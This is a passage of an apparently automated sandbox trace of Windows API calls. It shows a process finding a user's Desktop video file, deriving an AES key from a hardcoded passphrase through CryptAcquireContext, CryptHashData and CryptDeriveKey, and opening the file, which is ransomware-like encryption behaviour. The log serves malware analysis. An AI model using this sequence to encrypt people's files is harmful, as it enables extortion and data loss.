hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.799] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0119.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0119.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dcf8 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0119.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0119.801] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0119.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9b90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0119.802] CloseHandle (hObject=0x258) returned 1 [0119.802] FreeLibrary (hLibModule=0x772d0000) returned 1 [0119.802] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0119.802] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc36e39c0, ftCreationTime.dwHighDateTime=0x1d5ec74, ftLastAccessTime.dwLowDateTime=0x7de735d0, ftLastAccessTime.dwHighDateTime=0x1d5e9d8, ftLastWriteTime.dwLowDateTime=0x7de735d0, ftLastWriteTime.dwHighDateTime=0x1d5e9d8, nFileSizeHigh=0x0, nFileSizeLow=0x50c5, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="9IrmcPpBnuYGc4Yelr9W.mp4", cAlternateFileName="9IRMCP~1.MP4")) returned 0x41ac500 [0119.803] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0119.803] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0119.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0119.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0119.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0119.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0119.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0119.803] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0119.804] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0119.925] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0119.925] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0119.925] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0119.925] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.925] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0119.925] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.925] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0119.925] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0119.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca8e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0119.925] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0119.926] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0119.926] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca850, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0119.926] CryptHashData (hHash=0x41ac2c0, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0119.926] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.926] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0119.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca808, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0119.926] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac140) returned 1 [0119.926] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0119.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0119.927] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0119.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0119.928] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0119.928] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0119.928] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0119.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0119.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0119.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0119.928] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\9irmcppbnuygc4yelr9w.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0119.928] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.929] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0119.929] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0119.929] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0119.929] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0119.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0119.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0119.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0119.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0119.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0119.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0119.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0119.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0119.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0119.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0119.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0119.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0119.935] 